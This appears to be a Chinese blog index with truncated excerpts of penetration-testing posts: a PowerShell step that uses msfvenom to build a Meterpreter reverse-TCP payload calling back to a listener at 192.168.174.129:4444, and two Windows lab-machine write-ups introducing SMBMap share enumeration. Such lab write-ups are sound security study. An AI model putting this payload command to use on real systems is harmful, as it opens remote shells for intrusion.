Powershell Step 1：使用Msfvenom生成一个攻击载荷 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f psh-reflection >shell.ps1 Step 2：在 msf 中启动监听 use ex…

OverView 这是 hard 难度的 Windows 靶机。体验不错，就是绕。注意使用 tmux 进行 shell 的管理会轻松一点点。 Useful Skills and Tools SMBMap SMBMap 是一个允许使用者枚举目标机器上的共享目录，共享文件夹、权限以及文件上传下载删除的工具 参数： -u username -p pass…

终于考完试了，前阵子都在复习。周日开了 Windows 的机子来玩一下。虽然不像内网渗透有搭建隧道的过程，但是主要考察信息收集的能力。 OverView 中等难度的靶机。虽然没有拿到 root 的 flag 但是还是学到了很多东西 Useful Skills and Tools SMBmap 枚举目标机器上的共享目录 枚举驱动器权限 如果有权限的话…